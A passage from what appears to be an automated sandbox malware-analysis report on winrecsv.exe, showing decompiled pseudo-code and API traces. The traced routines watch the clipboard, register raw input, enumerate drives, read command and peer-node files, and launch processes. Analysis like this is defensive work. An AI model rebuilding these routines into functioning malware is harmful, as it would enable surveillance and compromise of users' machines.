                                                                                  • OpenClipboard.USER32(00000000), ref: 00403EB7
                                                                                  • GetClipboardData.USER32 ref: 00403EC9
                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00403FD0
                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 00403FDE
                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00403FF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                  • String ID:
                                                                                  • API String ID: 3549449529-0
                                                                                  • Opcode ID: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction ID: 0016380ad0389118889d1cf690c65c1d7a98e8f3a274b3db5f7ad41e70fd50c0
                                                                                  • Opcode Fuzzy Hash: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction Fuzzy Hash: B3713D75D00209EFDB14DFA4D848BEEBBB8BF48306F14852AF505B6290D7799B40CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 51%
                                                                                  			E004050B0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				short _v24;
                                                                                  				short _v556;
                                                                                  				short _v2604;
                                                                                  				intOrPtr _v2608;
                                                                                  				union _ULARGE_INTEGER _v2612;
                                                                                  				long _v2616;
                                                                                  				short _v3148;
                                                                                  				intOrPtr _v3152;
                                                                                  				intOrPtr _t34;
                                                                                  				intOrPtr _t36;
                                                                                  				intOrPtr _t38;
                                                                                  				struct %anon54 _t43;
                                                                                  				intOrPtr _t63;
                                                                                  				void* _t68;
                                                                                  				void* _t69;
                                                                                  				void* _t70;
                                                                                  
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				GetModuleFileNameW(0, "C:\Windows\winrecsv.exe", 0x104);
                                                                                  				_t34 = E0040D530("C:\Windows\winrecsv.exe"); // executed
                                                                                  				_t69 = _t68 + 4;
                                                                                  				 *0x414410 = _t34;
                                                                                  				while(1 != 0) {
                                                                                  					_t36 = E004048C0(); // executed
                                                                                  					_v8 = _t36;
                                                                                  					_v12 = 2;
                                                                                  					while(_v12 <= 0x19) {
                                                                                  						_t38 = E00404860(_v8, _v12,  &_v24); // executed
                                                                                  						_t69 = _t69 + 0xc;
                                                                                  						_v16 = _t38;
                                                                                  						_v3152 = _v16;
                                                                                  						if(_v3152 == 2 || _v3152 == 4) {
                                                                                  							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                  							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                  							_push(0);
                                                                                  							_push(0x40000000);
                                                                                  							_t63 = _v2608;
                                                                                  							_push(_t63);
                                                                                  							_t43 = _v2612.LowPart;
                                                                                  							_push(_t43);
                                                                                  							L0040F1B0();
                                                                                  							_push(_t63);
                                                                                  							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                  							_t70 = _t69 + 0x10;
                                                                                  							if((_v3148 & 0x0000ffff) == 0) {
                                                                                  								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                  								_t70 = _t70 + 8;
                                                                                  							}
                                                                                  							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                  							E00404BD0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                  							_t69 = _t70 + 0x20;
                                                                                  						}
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					Sleep(0x7d0); // executed
                                                                                  				}
                                                                                  				ExitThread(0);
                                                                                  			}






















                                                                                  0x004050be
                                                                                  0x004050d0
                                                                                  0x004050db
                                                                                  0x004050e0
                                                                                  0x004050e3
                                                                                  0x004050e8
                                                                                  0x004050f5
                                                                                  0x004050fa
                                                                                  0x004050fd
                                                                                  0x0040510f
                                                                                  0x00405125
                                                                                  0x0040512a
                                                                                  0x0040512d
                                                                                  0x00405133
                                                                                  0x00405140
                                                                                  0x0040516f
                                                                                  0x00405184
                                                                                  0x0040518a
                                                                                  0x0040518c
                                                                                  0x00405191
                                                                                  0x00405197
                                                                                  0x00405198
                                                                                  0x0040519e
                                                                                  0x0040519f
                                                                                  0x004051a4
                                                                                  0x004051b2
                                                                                  0x004051b8
                                                                                  0x004051c4
                                                                                  0x004051d2
                                                                                  0x004051d8
                                                                                  0x004051d8
                                                                                  0x004051f5
                                                                                  0x0040521b
                                                                                  0x00405220
                                                                                  0x00405220
                                                                                  0x0040510c
                                                                                  0x0040510c
                                                                                  0x0040522d
                                                                                  0x0040522d
                                                                                  0x0040523a

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 004050BE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\winrecsv.exe,00000104), ref: 004050D0
                                                                                    • Part of subcall function 0040D530: CreateFileW.KERNELBASE(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                    • Part of subcall function 0040D530: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                    • Part of subcall function 0040D530: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040D572
                                                                                  • ExitThread.KERNEL32 ref: 0040523A
                                                                                    • Part of subcall function 004048C0: GetLogicalDrives.KERNELBASE ref: 004048C6
                                                                                    • Part of subcall function 004048C0: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                    • Part of subcall function 004048C0: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                    • Part of subcall function 004048C0: RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 0040522D
                                                                                    • Part of subcall function 00404860: lstrcpyW.KERNEL32 ref: 004048B3
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040516F
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405184
                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040519F
                                                                                  • wsprintfW.USER32 ref: 004051B2
                                                                                  • wsprintfW.USER32 ref: 004051D2
                                                                                  • wsprintfW.USER32 ref: 004051F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filewsprintf$CloseSleep$ChangeCreateDiskDrivesExitFindFreeInformationLogicalModuleNameNotificationOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                  • String ID: (%dGB)$%s%s$C:\Windows\winrecsv.exe$Unnamed volume
                                                                                  • API String ID: 899515741-3032203380
                                                                                  • Opcode ID: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction ID: a985ed85a03a777e582de5830084f45234a9f7b72307fd88a6662299d951ba90
                                                                                  • Opcode Fuzzy Hash: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction Fuzzy Hash: 67418371D00214ABE754DB94DC45FEE7778EB48704F1085AAF209B51D0DA785B88CF6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 68%
                                                                                  			E00404000() {
                                                                                  				struct HWND__* _v8;
                                                                                  				struct tagMSG _v36;
                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                  				short _v596;
                                                                                  				unsigned int _t20;
                                                                                  				short _t25;
                                                                                  				struct HWND__* _t27;
                                                                                  				void* _t39;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				do {
                                                                                  					_v84.cbSize = 0;
                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                  					_t40 = _t39 + 0xc;
                                                                                  					_v84.cbSize = 0x30;
                                                                                  					_v84.lpfnWndProc = E00403DB0;
                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                  					do {
                                                                                  						Sleep(1); // executed
                                                                                  						_t20 = GetTickCount();
                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                  						_t40 = _t40 + 0x10;
                                                                                  						_t25 = RegisterClassExW( &_v84); // executed
                                                                                  					} while ((_t25 & 0x0000ffff) == 0);
                                                                                  					_t27 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0); // executed
                                                                                  					_v8 = _t27;
                                                                                  					if(_v8 != 0) {
                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                  							TranslateMessage( &_v36);
                                                                                  							DispatchMessageA( &_v36);
                                                                                  						}
                                                                                  						goto L7;
                                                                                  					}
                                                                                  					break;
                                                                                  					L7:
                                                                                  				} while (0 != 0);
                                                                                  				ExitThread(0);
                                                                                  			}












                                                                                  0x00404009
                                                                                  0x00404009
                                                                                  0x00404018
                                                                                  0x0040401d
                                                                                  0x00404020
                                                                                  0x00404027
                                                                                  0x00404036
                                                                                  0x0040403f
                                                                                  0x00404042
                                                                                  0x00404044
                                                                                  0x0040404a
                                                                                  0x00404066
                                                                                  0x0040406c
                                                                                  0x00404073
                                                                                  0x0040407c
                                                                                  0x0040409c
                                                                                  0x004040a2
                                                                                  0x004040a9
                                                                                  0x004040ad
                                                                                  0x004040c5
                                                                                  0x004040cf
                                                                                  0x004040cf
                                                                                  0x00000000
                                                                                  0x004040ad
                                                                                  0x00000000
                                                                                  0x004040d7
                                                                                  0x004040d7
                                                                                  0x004040e1

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                  • String ID: %x%X$0
                                                                                  • API String ID: 716646876-225668902
                                                                                  • Opcode ID: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction ID: 19d221db94b3e63cef1269c4be0118e099b5cb739eae60d914623c84e45eccf5
                                                                                  • Opcode Fuzzy Hash: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction Fuzzy Hash: 3021F170A40318ABEB109BE0DC49FEE7B78BB44701F508129F705B61D0DBB955448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040A020() {
                                                                                  				void* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				long _v24;
                                                                                  				DWORD* _v28;
                                                                                  				signed int _v32;
                                                                                  				void* _t39;
                                                                                  				intOrPtr _t41;
                                                                                  				void* _t42;
                                                                                  				void* _t74;
                                                                                  
                                                                                  				InitializeCriticalSection(0x414e4c);
                                                                                  				_v12 = 0;
                                                                                  				while(_v12 < 0x200) {
                                                                                  					E00409D70( *((intOrPtr*)(0x4133b8 + _v12 * 4)), E0040C210(), 0); // executed
                                                                                  					_t74 = _t74 + 0xc;
                                                                                  					_v12 = _v12 + 1;
                                                                                  				}
                                                                                  				_t39 = CreateFileW("C:\Users\frontdesk\tnnodes.dat", 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                  				_v8 = _t39;
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v16 != 0) {
                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                  						if(_v20 != 0) {
                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                  							_v28 = 0;
                                                                                  							_v32 = 0;
                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                  								E00409D70( *((intOrPtr*)(_v20 + _v32 * 8)), E0040C210() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                  								_t74 = _t74 + 0xc;
                                                                                  								_v28 =  &(_v28[2]);
                                                                                  								_v32 = _v32 + 1;
                                                                                  							}
                                                                                  							UnmapViewOfFile(_v20);
                                                                                  						}
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					CloseHandle(_v8); // executed
                                                                                  				}
                                                                                  				E00409A90(); // executed
                                                                                  				_t41 =  *0x414e68; // 0x930628
                                                                                  				_t42 = E0040BF50(_t41, 0, E00409960, 0, 0, 0); // executed
                                                                                  				return _t42;
                                                                                  			}














                                                                                  0x0040a02b
                                                                                  0x0040a031
                                                                                  0x0040a043
                                                                                  0x0040a05f
                                                                                  0x0040a064
                                                                                  0x0040a040
                                                                                  0x0040a040
                                                                                  0x0040a07d
                                                                                  0x0040a083
                                                                                  0x0040a08a
                                                                                  0x0040a0a4
                                                                                  0x0040a0ab
                                                                                  0x0040a0c3
                                                                                  0x0040a0ca
                                                                                  0x0040a0d8
                                                                                  0x0040a0db
                                                                                  0x0040a0e2
                                                                                  0x0040a0fd
                                                                                  0x0040a12a
                                                                                  0x0040a12f
                                                                                  0x0040a0f1
                                                                                  0x0040a0fa
                                                                                  0x0040a0fa
                                                                                  0x0040a138
                                                                                  0x0040a138
                                                                                  0x0040a142
                                                                                  0x0040a142
                                                                                  0x0040a14c
                                                                                  0x0040a14c
                                                                                  0x0040a152
                                                                                  0x0040a164
                                                                                  0x0040a16a
                                                                                  0x0040a175

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(00414E4C,?,?,?,?,?,?,004068A0), ref: 0040A02B
                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tnnodes.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A07D
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040A09E
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040A0BD
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040A0D2
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040A138
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A142
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040A14C
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Strings
                                                                                  • C:\Users\user\tnnodes.dat, xrefs: 0040A078
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                  • String ID: C:\Users\user\tnnodes.dat
                                                                                  • API String ID: 439099756-238434947
                                                                                  • Opcode ID: 2c2dbae3a8763e6bc590333b25d0c604acd08149e9b9b32ea208a451803659fc
                                                                                  • Instruction ID: acc5326b5384c580b36ed7733cff79295e061d02a32601855545f98bc6dcfb13
                                                                                  • Opcode Fuzzy Hash: 2c2dbae3a8763e6bc590333b25d0c604acd08149e9b9b32ea208a451803659fc
                                                                                  • Instruction Fuzzy Hash: 4D413A74E40308ABDB10DFA4CC4ABAEB774BB44704F208569E6117B2C1C6B96A51CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 287 404200-404232 InitializeCriticalSection CreateFileW 288 404325-404328 287->288 289 404238-404253 CreateFileMappingW 287->289 290 404259-404272 MapViewOfFile 289->290 291 40431b-40431f CloseHandle 289->291 292 404311-404315 CloseHandle 290->292 293 404278-40428a GetFileSize 290->293 291->288 292->291 294 40428d-404291 293->294 295 404293-40429a 294->295 296 404307-40430b UnmapViewOfFile 294->296 297 40429c 295->297 298 40429e-4042b1 call 40b4f0 295->298 296->292 297->296 301 4042b3 298->301 302 4042b5-4042ca 298->302 301->296 303 4042da-404305 call 4040f0 302->303 304 4042cc-4042d8 call 408fb0 302->304 303->294 304->296
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404200() {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				long _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				void* _t35;
                                                                                  				intOrPtr _t45;
                                                                                  				void* _t66;
                                                                                  				void* _t67;
                                                                                  
                                                                                  				InitializeCriticalSection(0x4143f0);
                                                                                  				_t35 = CreateFileW("C:\Users\frontdesk\tncmds.dat", 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                  				_v8 = _t35;
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v12 == 0) {
                                                                                  						L14:
                                                                                  						return CloseHandle(_v8);
                                                                                  					}
                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                  					if(_v16 == 0) {
                                                                                  						L13:
                                                                                  						CloseHandle(_v12);
                                                                                  						goto L14;
                                                                                  					}
                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                  					_v24 = _v16;
                                                                                  					while(_v20 != 0) {
                                                                                  						if(_v20 >= 0x100) {
                                                                                  							_t45 = E0040B4F0(_v24, _v24);
                                                                                  							_t67 = _t66 + 4;
                                                                                  							_v28 = _t45;
                                                                                  							if(_v28 != 0) {
                                                                                  								_v20 = _v20 - 0x100;
                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                  									E004040F0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                  									_t66 = _t67 + 0x10;
                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                  									continue;
                                                                                  								}
                                                                                  								E00408FB0(_v28);
                                                                                  								break;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v16);
                                                                                  					goto L13;
                                                                                  				}
                                                                                  				return _t35;
                                                                                  			}













                                                                                  0x0040420b
                                                                                  0x00404225
                                                                                  0x0040422b
                                                                                  0x00404232
                                                                                  0x0040424c
                                                                                  0x00404253
                                                                                  0x0040431b
                                                                                  0x00000000
                                                                                  0x0040431f
                                                                                  0x0040426b
                                                                                  0x00404272
                                                                                  0x00404311
                                                                                  0x00404315
                                                                                  0x00000000
                                                                                  0x00404315
                                                                                  0x00404284
                                                                                  0x0040428a
                                                                                  0x0040428d
                                                                                  0x0040429a
                                                                                  0x004042a2
                                                                                  0x004042a7
                                                                                  0x004042aa
                                                                                  0x004042b1
                                                                                  0x004042be
                                                                                  0x004042ca
                                                                                  0x004042f1
                                                                                  0x004042f6
                                                                                  0x00404302
                                                                                  0x00000000
                                                                                  0x00404302
                                                                                  0x004042d0
                                                                                  0x00000000
                                                                                  0x004042d5
                                                                                  0x00000000
                                                                                  0x004042b3
                                                                                  0x00000000
                                                                                  0x0040429c
                                                                                  0x0040430b
                                                                                  0x00000000
                                                                                  0x0040430b
                                                                                  0x00404328

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(004143F0,?,?,?,?,?,0040686A), ref: 0040420B
                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tncmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,0040686A), ref: 00404225
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404246
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404265
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040427E
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040430B
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404315
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040431F
                                                                                  Strings
                                                                                  • C:\Users\user\tncmds.dat, xrefs: 00404220
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                  • String ID: C:\Users\user\tncmds.dat
                                                                                  • API String ID: 3956458805-1428318279
                                                                                  • Opcode ID: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction ID: 273e13aa2dc466d5bf8d435bda3035c4f53c51da1c9f1d325813a3c854b8a587
                                                                                  • Opcode Fuzzy Hash: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction Fuzzy Hash: 2C3133B4E00209EFDB14DFA4DC49FAEB770AB88704F208569F601772C1D7B96581CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 309 40d740-40d79e memset CreateProcessW 310 40d7a0-40d7ad Sleep 309->310 311 40d7af-40d7d3 ShellExecuteW 309->311 312 40d7e6-40d7e9 310->312 313 40d7e4 311->313 314 40d7d5-40d7e2 Sleep 311->314 313->312 314->312
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D740(char _a4) {
                                                                                  				void* _v8;
                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                  				struct _STARTUPINFOW _v100;
                                                                                  				intOrPtr _v104;
                                                                                  				int _t20;
                                                                                  
                                                                                  				memset( &_v100, 0, 0x44);
                                                                                  				_v24.hProcess = 0;
                                                                                  				_v24.hThread = 0;
                                                                                  				_v24.dwProcessId = 0;
                                                                                  				_v24.dwThreadId = 0;
                                                                                  				_v100.cb = 0x44;
                                                                                  				_v100.dwFlags = 1;
                                                                                  				_v100.wShowWindow = 5;
                                                                                  				_t11 =  &_a4; // 0x40656e
                                                                                  				_t20 = CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                  				if(_t20 != 1) {
                                                                                  					_t12 =  &_a4; // 0x40656e
                                                                                  					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                  					_v104 = _v8;
                                                                                  					if(_v104 <= 0x20) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					return 1;
                                                                                  				}
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				return 1;
                                                                                  			}








                                                                                  0x0040d74e
                                                                                  0x0040d758
                                                                                  0x0040d75b
                                                                                  0x0040d75e
                                                                                  0x0040d761
                                                                                  0x0040d764
                                                                                  0x0040d76b
                                                                                  0x0040d777
                                                                                  0x0040d78f
                                                                                  0x0040d795
                                                                                  0x0040d79e
                                                                                  0x0040d7b5
                                                                                  0x0040d7c6
                                                                                  0x0040d7cc
                                                                                  0x0040d7d3
                                                                                  0x00000000
                                                                                  0x0040d7e4
                                                                                  0x0040d7da
                                                                                  0x00000000
                                                                                  0x0040d7e0
                                                                                  0x0040d7a5
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D74E
                                                                                  • CreateProcessW.KERNELBASE ref: 0040D795
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040D7A5
                                                                                  • ShellExecuteW.SHELL32(00000000,open,ne@,00000000,00000000,00000000), ref: 0040D7C0
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D7DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                  • String ID: $D$ne@$open
                                                                                  • API String ID: 2222793131-3207568236
                                                                                  • Opcode ID: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction ID: 933796f3933de1520c7fb78abd268757ff0d70a2e837ae2d9ddd379650c1acbf
                                                                                  • Opcode Fuzzy Hash: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction Fuzzy Hash: 05110071E84308BBEB14DFD4DD46BDE7774AB18700F20412AF609BB2C0D7B55A448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 315 40d580-40d5c1 CreateFileW 316 40d6d3-40d6d7 315->316 317 40d5c7-40d5e2 CreateFileMappingW 315->317 320 40d6d9-40d6f9 CreateFileW 316->320 321 40d72d-40d735 316->321 318 40d5e8-40d601 MapViewOfFile 317->318 319 40d6c9-40d6cd CloseHandle 317->319 322 40d607-40d61d GetFileSize 318->322 323 40d6bf-40d6c3 CloseHandle 318->323 319->316 324 40d721-40d72a call 408fb0 320->324 325 40d6fb-40d71b WriteFile CloseHandle 320->325 326 40d623-40d636 call 40b4c0 322->326 327 40d6b5-40d6b9 UnmapViewOfFile 322->327 323->319 324->321 325->324 326->327 332 40d638-40d647 326->332 327->323 332->327 333 40d649-40d678 call 40ae60 332->333 333->327 336 40d67a-40d6a0 call 409800 333->336 336->327 339 40d6a2-40d6ae call 408fb0 336->339 339->327
                                                                                  C-Code - Quality: 83%
                                                                                  			E0040D580(WCHAR* _a4) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				DWORD* _v20;
                                                                                  				char _v21;
                                                                                  				void* _v28;
                                                                                  				void* _v32;
                                                                                  				char _v48;
                                                                                  				void* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t62;
                                                                                  				void* _t64;
                                                                                  				DWORD* _t70;
                                                                                  				void* _t73;
                                                                                  				void* _t103;
                                                                                  
